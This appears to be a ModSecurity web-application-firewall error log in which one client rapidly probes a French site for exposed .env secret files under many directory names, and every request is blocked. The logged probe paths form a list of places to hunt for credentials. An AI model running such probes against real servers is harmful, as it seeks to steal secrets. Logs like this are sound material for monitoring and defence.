[Mon May 11 15:50:06.799570 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHejqy-5-wpj6Sx56aifQAAABc"]
[Mon May 11 15:50:06.799789 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHejqy-5-wpj6Sx56aifQAAABc"]
[Mon May 11 15:50:06.896605 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHejqy-5-wpj6Sx56aifwAAABc"]
[Mon May 11 15:50:06.897073 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHejqy-5-wpj6Sx56aifwAAABc"]
[Mon May 11 15:50:06.897329 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHejqy-5-wpj6Sx56aifwAAABc"]
[Mon May 11 15:50:06.997124 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHejqy-5-wpj6Sx56aigAAAABc"]
[Mon May 11 15:50:06.997623 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHejqy-5-wpj6Sx56aigAAAABc"]
[Mon May 11 15:50:06.997860 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHejqy-5-wpj6Sx56aigAAAABc"]
[Mon May 11 15:50:07.093598 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigQAAABc"]
[Mon May 11 15:50:07.094096 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigQAAABc"]
[Mon May 11 15:50:07.094350 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigQAAABc"]
[Mon May 11 15:50:07.188465 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHej6y-5-wpj6Sx56aiggAAABc"]
[Mon May 11 15:50:07.188956 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHej6y-5-wpj6Sx56aiggAAABc"]
[Mon May 11 15:50:07.189208 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHej6y-5-wpj6Sx56aiggAAABc"]
[Mon May 11 15:50:07.287196 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigwAAABc"]
[Mon May 11 15:50:07.287677 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigwAAABc"]
[Mon May 11 15:50:07.287897 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHej6y-5-wpj6Sx56aigwAAABc"]
[Mon May 11 15:50:07.387270 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHej6y-5-wpj6Sx56aihAAAABc"]
[Mon May 11 15:50:07.387683 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHej6y-5-wpj6Sx56aihAAAABc"]
[Mon May 11 15:50:07.387883 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agHej6y-5-wpj6Sx56aihAAAABc"]
[Mon May 11 15:50:07.486845 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHej6y-5-wpj6Sx56aihQAAABc"]
[Mon May 11 15:50:07.487342 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHej6y-5-wpj6Sx56aihQAAABc"]
[Mon May 11 15:50:07.487566 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agHej6y-5-wpj6Sx56aihQAAABc"]
[Mon May 11 15:50:07.581794 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHej6y-5-wpj6Sx56aihgAAABc"]
[Mon May 11 15:50:07.582195 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHej6y-5-wpj6Sx56aihgAAABc"]
[Mon May 11 15:50:07.582401 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agHej6y-5-wpj6Sx56aihgAAABc"]
[Mon May 11 15:50:07.676050 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHej6y-5-wpj6Sx56aihwAAABc"]
[Mon May 11 15:50:07.676460 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHej6y-5-wpj6Sx56aihwAAABc"]
[Mon May 11 15:50:07.676655 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHej6y-5-wpj6Sx56aihwAAABc"]
[Mon May 11 15:50:07.772658 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiAAAABc"]
[Mon May 11 15:50:07.773068 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiAAAABc"]
[Mon May 11 15:50:07.773280 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiAAAABc"]
[Mon May 11 15:50:07.867664 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiQAAABc"]
[Mon May 11 15:50:07.868067 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiQAAABc"]
[Mon May 11 15:50:07.868300 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiQAAABc"]
[Mon May 11 15:50:07.962602 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiwAAABc"]
[Mon May 11 15:50:07.963051 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiwAAABc"]
[Mon May 11 15:50:07.963274 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agHej6y-5-wpj6Sx56aiiwAAABc"]
[Mon May 11 15:50:08.057986 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHekKy-5-wpj6Sx56aijQAAABc"]
[Mon May 11 15:50:08.058440 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHekKy-5-wpj6Sx56aijQAAABc"]
